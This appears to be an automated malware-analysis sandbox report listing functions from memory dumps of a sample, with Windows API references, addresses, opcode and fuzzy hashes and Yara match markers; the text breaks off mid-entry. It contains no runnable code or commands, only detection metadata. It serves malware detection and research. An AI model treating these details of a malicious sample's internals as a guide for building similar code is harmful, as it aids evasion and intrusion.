Instruction ID: c1ec5d85c3f256f1c581d13e504ecc4d906e7e102f7589d46dce47dfb9cd0bfc
Opcode Fuzzy Hash: f59917d92484cb1ca09b70956424b611a01e4ac11d9517d279d79911bad871a6
Instruction Fuzzy Hash: 4C32A578A016299FCB64DF68DC94B9DBBF2BB48312F1181E6D909A3315DB349E81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE37C5, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 483libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: 4324bccdf991b6ba3953218a1827126d71fcceb5664d8215840c8034555c65a9
Instruction ID: 6187a5a842c993cddcf82612315c7ff4ba89f560f795e1cf63357619507d7fc6
Opcode Fuzzy Hash: 4324bccdf991b6ba3953218a1827126d71fcceb5664d8215840c8034555c65a9
Instruction Fuzzy Hash: 8D32A578A016299FCB64DF68DC94B9DBBF2BB48312F1181E6D909A3315DB349E81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3819, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 471libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: 37f3ed68c6423e09fb98131c96d62b9e7dec7b53f4590ffad701f74b4502ee8d
Instruction ID: 9ff81d4399d5b46cb238f58a3909cf41aacfee99224b5ebb17b8b11bdfe55ca8
Opcode Fuzzy Hash: 37f3ed68c6423e09fb98131c96d62b9e7dec7b53f4590ffad701f74b4502ee8d
Instruction Fuzzy Hash: 2532B578A016299FCB64DF68DC94B9DBBF2BB48312F1181E6D909A3315DB349E81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3864, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 463libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: f7ef6c4f934ce5ebbe05a656a68767967fedb64a056854e15b88f81f28d71f7d
Instruction ID: bfb65b4323c7b900536fe5062a1b808eea5aade1e0ab9819cd23a96015de888d
Opcode Fuzzy Hash: f7ef6c4f934ce5ebbe05a656a68767967fedb64a056854e15b88f81f28d71f7d
Instruction Fuzzy Hash: 1432A678A006299FCB64DF68DC94B9DBBF2BB48312F1181E6D909A3315DB349E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE38B8, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 453libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: 3afdc1e29b8dcab5292e88d2ab3fa32547c0f168b6b46a8f6a1c0b32dec09d5c
Instruction ID: 1852181764e1fcfbc4298f6e1bb1fc35df74babda577134d95c058363849eeb2
Opcode Fuzzy Hash: 3afdc1e29b8dcab5292e88d2ab3fa32547c0f168b6b46a8f6a1c0b32dec09d5c
Instruction Fuzzy Hash: 9822B678A016299FCB64DF68DC94B9DBBF2BB48302F1181E6D909A3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE390C, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 441libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: 69d548da435082ac48e83b38dea5ac02aebe88473338294c23545723b764e836
Instruction ID: e71bac8f64b0bc8d94a2c9676f7c8aaa04f69b745ef47d797d0c7c92ec3355b2
Opcode Fuzzy Hash: 69d548da435082ac48e83b38dea5ac02aebe88473338294c23545723b764e836
Instruction Fuzzy Hash: FF22B878A016299FCB64DF68DC94B9DBBF1BB48302F1181E6D909A3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3957, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 433libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: 9a3f1d9211e6b632fe314158a859180366708949891f00c345a97556942e26b7
Instruction ID: a85e4e1c7bc0934fe5bf2b23d3fdd27ae5d44ac51269dc1a2066000f777cbc5b
Opcode Fuzzy Hash: 9a3f1d9211e6b632fe314158a859180366708949891f00c345a97556942e26b7
Instruction Fuzzy Hash: 5622B778A016299FCB64DF68DC94B9DBBF1BB48302F1181E6D90AA3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE39AB, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 423libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 2166744745-3673016210
Opcode ID: d2f6431d28a5db6b019acfafec99149f2e408a13de56914a787ee2b16e2d3355
Instruction ID: 44d1952052330e4e02a75083ab83ad99ec1b164a86849de02c3ab4b254a62dfa
Opcode Fuzzy Hash: d2f6431d28a5db6b019acfafec99149f2e408a13de56914a787ee2b16e2d3355
Instruction Fuzzy Hash: B722C878A006299FCB64DF68DC94B9DBBF1BB48302F1181E6D90AA3315DB349E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3A02, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 413libraryCOMMON

Download Yara Rule

APIs

WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepRegister$CompatDataData2DebugExceptionFaultFileInitInitializeLaunchModuleQuirkReportRuntimeThunkWerp
String ID: :@fq
API String ID: 1496630747-3673016210
Opcode ID: 40b8197e032c5e114e4aa1ea5d0199ab78bb8c6d5fc9c53c5d856191ab458d80
Instruction ID: 93c838b670e0ec5ff93b5397d438d90d28a126eb445740bff1e5befeaf71fa3a
Opcode Fuzzy Hash: 40b8197e032c5e114e4aa1ea5d0199ab78bb8c6d5fc9c53c5d856191ab458d80
Instruction Fuzzy Hash: 4D12B978A016299FCB64DF68DC94B9DBBF1BB48302F1181E6D90AA3315DB349E85DF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3A59, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 403libraryCOMMON

Download Yara Rule

APIs

WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepRegister$CompatDataData2ExceptionFaultFileInitInitializeModuleQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1987993552-3673016210
Opcode ID: a48e898be423bf066b5a0b501e27eb575121a137297452429022b948269a21cb
Instruction ID: 193594d1da745869fb5484917c2496056b39099ea13d27db57ac952cc66a1f4c
Opcode Fuzzy Hash: a48e898be423bf066b5a0b501e27eb575121a137297452429022b948269a21cb
Instruction Fuzzy Hash: D812B978A016299FCB64DF68DC94B9DBBF1BB48302F1181E5D90AA3315DB349E85DF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3AB0, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 391libraryCOMMON

Download Yara Rule

APIs

WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: BasepWorker$CompatDataData2ExceptionFaultInitInitializeModuleQuirkRegisterReportRuntimeThunk
String ID: :@fq
API String ID: 1566824908-3673016210
Opcode ID: 24ff73a4cf516d4a96498f15d5eccb42c7e42ed34f0851f7ba77afc11f62487f
Instruction ID: 506fe78c31cdb926431a155ed05b3109e7657b62903cd8258e1ebe06759026cf
Opcode Fuzzy Hash: 24ff73a4cf516d4a96498f15d5eccb42c7e42ed34f0851f7ba77afc11f62487f
Instruction Fuzzy Hash: FE12C878A016299FCB64DF68DC98B9DBBF1BB48302F1181E5D90AA3315DB349E85DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00FA117C, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 405threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00FA1197

Strings

a, xrefs: 00FA1CAF

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID: a
API String ID: 1852365436-3605898657
Opcode ID: 0bb9da3acaf934cb4af0fe9505588ab781a9531ca215836ec15f59881aeb1194
Instruction ID: 9ab6cd62f0da34d9da44b8ae69436be53ff31f4031d39760675242654365769b
Opcode Fuzzy Hash: 0bb9da3acaf934cb4af0fe9505588ab781a9531ca215836ec15f59881aeb1194
Instruction Fuzzy Hash: AFD113F170030AAFEF211E64CC9ABD93666FF16764F554228FE449B2C1D3B998C4AB40

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3F25, Relevance: 4.7, APIs: 3, Instructions: 223COMMON

Download Yara Rule

APIs

BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Basep$CompatDataData2FaultInitQuirkReportWorker
String ID:
API String ID: 427606047-0
Opcode ID: b51e2a1d376d1befe35445a3ed817eafa1ffd144858cc6a45b3a6e03ca198d25
Instruction ID: 4fa3e083af43814f1b827630c6fad2257e85b405e17cdc6d48a6dd054be664a4
Opcode Fuzzy Hash: b51e2a1d376d1befe35445a3ed817eafa1ffd144858cc6a45b3a6e03ca198d25
Instruction Fuzzy Hash: E6B19578A01A29CFCB64DF28DC94A99BBF1FB48316F1081E6E90DA7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3F7C, Relevance: 4.7, APIs: 3, Instructions: 213COMMON

Download Yara Rule

APIs

BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Basep$CompatDataData2FaultInitQuirkReportWorker
String ID:
API String ID: 427606047-0
Opcode ID: 789cb7a7df0c0a53888f680df2450d1cb9a85eb56b34d37be1867545304cfac5
Instruction ID: 97d444dee09f80d1ab567e5a795c966c5c815445f4c5b25b50d7399859d1f761
Opcode Fuzzy Hash: 789cb7a7df0c0a53888f680df2450d1cb9a85eb56b34d37be1867545304cfac5
Instruction Fuzzy Hash: 6BB19578E01A29DFCB64DF28DC94A99BBF1FB48316F1081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3FD3, Relevance: 4.7, APIs: 3, Instructions: 203COMMON

Download Yara Rule

APIs

BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Basep$CompatDataData2FaultInitQuirkReportWorker
String ID:
API String ID: 427606047-0
Opcode ID: ba093ed5e2cf32c349f9c06d2d3530514dba33fd59f8f1b88cec4e9c0eb05ff5
Instruction ID: 43c220b946547dbb4232c65624e119c3404ab467c00d0389a91d8074b52edfbc
Opcode Fuzzy Hash: ba093ed5e2cf32c349f9c06d2d3530514dba33fd59f8f1b88cec4e9c0eb05ff5
Instruction Fuzzy Hash: 09A19678E01A29CFCB64DF28DC94A99BBF1FB48316F1081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE402A, Relevance: 4.7, APIs: 3, Instructions: 193COMMON

Download Yara Rule

APIs

BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Basep$CompatDataData2FaultInitQuirkReportWorker
String ID:
API String ID: 427606047-0
Opcode ID: 26e155e6ae91fee0f683a2d116d4b7f265da1175ed9b6dbc94026aa31c669b62
Instruction ID: 39567d4bfa7d8ff9b460dc14ff6741735fd542d2064ae4c5eb17fcae5e3f83ac
Opcode Fuzzy Hash: 26e155e6ae91fee0f683a2d116d4b7f265da1175ed9b6dbc94026aa31c669b62
Instruction Fuzzy Hash: 1BA1A478A01A29CFCB64DF28DC94B99BBF1FB48316F5081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE408D, Relevance: 4.7, APIs: 3, Instructions: 180COMMON

Download Yara Rule

APIs

BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Basep$CompatDataData2FaultInitQuirkReportWorker
String ID:
API String ID: 427606047-0
Opcode ID: c5b392c168110aecdd1d9973f70a1d3174e53facd426beedfba0db2f81e8f2c4
Instruction ID: 2105535c66a9507cf53acdfa0393614bcceed87d4c373026267698c71fc00059
Opcode Fuzzy Hash: c5b392c168110aecdd1d9973f70a1d3174e53facd426beedfba0db2f81e8f2c4
Instruction Fuzzy Hash: F891A378A11A29CFCB64CF28DC94B99BBF1FB48316F5081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 00FA114F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00FA1197

Strings

a, xrefs: 00FA1CAF

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID: a
API String ID: 1852365436-3605898657
Opcode ID: 7a24d2c7b8b5274a2252e0a212d1e2e4de9010035f7743f56d98f8afb1ea73dd
Instruction ID: c32c941b1c34000f929b897e11719a8caffc213795f432789b0804dc9e7a040c
Opcode Fuzzy Hash: 7a24d2c7b8b5274a2252e0a212d1e2e4de9010035f7743f56d98f8afb1ea73dd
Instruction Fuzzy Hash: 011136F56003041FDB216FA8CDE5B893B58FF1B330F6243A1E9A18B1E2E278D4809621

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE40E4, Relevance: 3.2, APIs: 2, Instructions: 170COMMON

Download Yara Rule

APIs

BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: BasepCompatDataData2InitQuirkWorker
String ID:
API String ID: 2858381214-0
Opcode ID: ce718f458e3ea083572cc8cf39ad833b05afa592a032a48ab5c73c5c819153f6
Instruction ID: 1e33fda9cb2b7134ee53b091a0a73aa792fed18948aecd974e707129bd067f18
Opcode Fuzzy Hash: ce718f458e3ea083572cc8cf39ad833b05afa592a032a48ab5c73c5c819153f6
Instruction Fuzzy Hash: 60819478A01A29DFCB64CF28DC94B99BBF1FB48316F5081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE413B, Relevance: 3.2, APIs: 2, Instructions: 160COMMON

Download Yara Rule

APIs

BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: BasepCompatDataData2InitQuirkWorker
String ID:
API String ID: 2858381214-0
Opcode ID: 629867053370812c57a42749eaaea24933e028322428529212f2595f123b04e7
Instruction ID: db7c35b402316a81fd0e78f338cf1e23633b77f48e26ef838e5ac38a6f46c775
Opcode Fuzzy Hash: 629867053370812c57a42749eaaea24933e028322428529212f2595f123b04e7
Instruction Fuzzy Hash: 3881B578A01A29DFCB64CF28DC94B99BBF1FB48316F1081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE4192, Relevance: 3.2, APIs: 2, Instructions: 150COMMON

Download Yara Rule

APIs

BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: BasepCompatDataData2InitQuirkWorker
String ID:
API String ID: 2858381214-0
Opcode ID: 0a28bba867b39fffd57af04959aa55d4a91e6bd3e45d5b04261530c0b97ba977
Instruction ID: bf8a6c147491acfd8fa8a68c3ccfe99b944b5dd93219b1a047b9113192f824e9
Opcode Fuzzy Hash: 0a28bba867b39fffd57af04959aa55d4a91e6bd3e45d5b04261530c0b97ba977
Instruction Fuzzy Hash: F371B678A00A29DFCB64DF28DC94B99BBF1BB48316F1081E6E909A7315D7309E858F05

Uniqueness

Uniqueness Score: -1.00%

Function 20512504, Relevance: 3.1, APIs: 2, Instructions: 113synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 205124AD
shutdown.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512598

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: CreateMutexshutdown
String ID:
API String ID: 3897568296-0
Opcode ID: b6c49f96efcdeebefdf27fabfd1f78d9e93e7289f2c03905595ef875bf561bd1
Instruction ID: 1f42b58d81a2926678d9cc5e3419bbef120596eb237b7cbd6c6ff1b6c8a1074a
Opcode Fuzzy Hash: b6c49f96efcdeebefdf27fabfd1f78d9e93e7289f2c03905595ef875bf561bd1
Instruction Fuzzy Hash: 8841C2B15093849FE712CF54DC85B96FFA8EF45320F0884AAED848F293D374A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2247D, Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

jqH., xrefs: 1DB22511
1'r<, xrefs: 1DB224AC

Memory Dump Source

Source File: 00000003.00000002.908095451.000000001DB22000.00000040.00000001.sdmp, Offset: 1DB22000, based on PE: false

Similarity

API ID:
String ID: 1'r<$jqH.
API String ID: 0-4112578978
Opcode ID: cafb134f270ee8bb5e274347a354a2c8edf33c12268c8a5ff654a758d12c837d
Instruction ID: 85c1875e77d629aec9cea6c5e845ff7b30750c4d64772e7ae3112126a1a9b90d
Opcode Fuzzy Hash: cafb134f270ee8bb5e274347a354a2c8edf33c12268c8a5ff654a758d12c837d
Instruction Fuzzy Hash: E5C1EC66A4E3C25FD3034B3848A5685BF71AF13614F8A41CBE199CF1E3D28D6889C763

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE64E8, Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

APIs

QuirkIsEnabled2Worker.KERNEL32 ref: 1FEE6575

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Enabled2QuirkWorker
String ID:
API String ID: 866893151-0
Opcode ID: c286b415d0a30c1fa07d8031175a922aa6305adbace1397a6eff346f393c8d5b
Instruction ID: 23d91188e9effa397e83655b8e4ca3fe466f03209ad33d43cce133e643a94533
Opcode Fuzzy Hash: c286b415d0a30c1fa07d8031175a922aa6305adbace1397a6eff346f393c8d5b
Instruction Fuzzy Hash: 82A15874A00205DFCB04DBB8D598AADBBF2AF88314F258569E406EB359EB35EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1800, Relevance: 1.7, APIs: 1, Instructions: 211libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e024e618f132a2683a22302fc9db134825177f482c1939be7617cb0849e3ee11
Instruction ID: e8d6a2234f72de9db6ecc19bf3ea976b3996a8e3ea1973bcbd85f7cb55007d5a
Opcode Fuzzy Hash: e024e618f132a2683a22302fc9db134825177f482c1939be7617cb0849e3ee11
Instruction Fuzzy Hash: 84614EE1E0C3C45FCB659B784D696997F747E53320F1D828EE8818A453D72DC845A352

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE8008, Relevance: 1.7, APIs: 1, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FEE806E

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe6d99ae95995244d2f914a461e41956d8e6e729ffe0afbb2ef80d29f28f325f
Instruction ID: 66a224c22e7861fe4525034848711810acf37277daf44549b83a8fdc2e0e3f2a
Opcode Fuzzy Hash: fe6d99ae95995244d2f914a461e41956d8e6e729ffe0afbb2ef80d29f28f325f
Instruction Fuzzy Hash: BA518235B002199FCB04DBB8D884A9EB7F6FF88304F148569E506EB245EF30E905DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE8001, Relevance: 1.6, APIs: 1, Instructions: 147libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FEE806E

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05f9487e72244bc961bb1885d3e774f061a33bb024ddcb52d970f587fa12dd0f
Instruction ID: 9895babc487bf407700cf324c6c8c965d4b3b82a14c2fdf706a3b178f162650a
Opcode Fuzzy Hash: 05f9487e72244bc961bb1885d3e774f061a33bb024ddcb52d970f587fa12dd0f
Instruction Fuzzy Hash: C3515375B002099FCB04DBB4D984A9EB7F6FF88344F148569E506EB245EF31E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE41E9, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Memory Dump Source

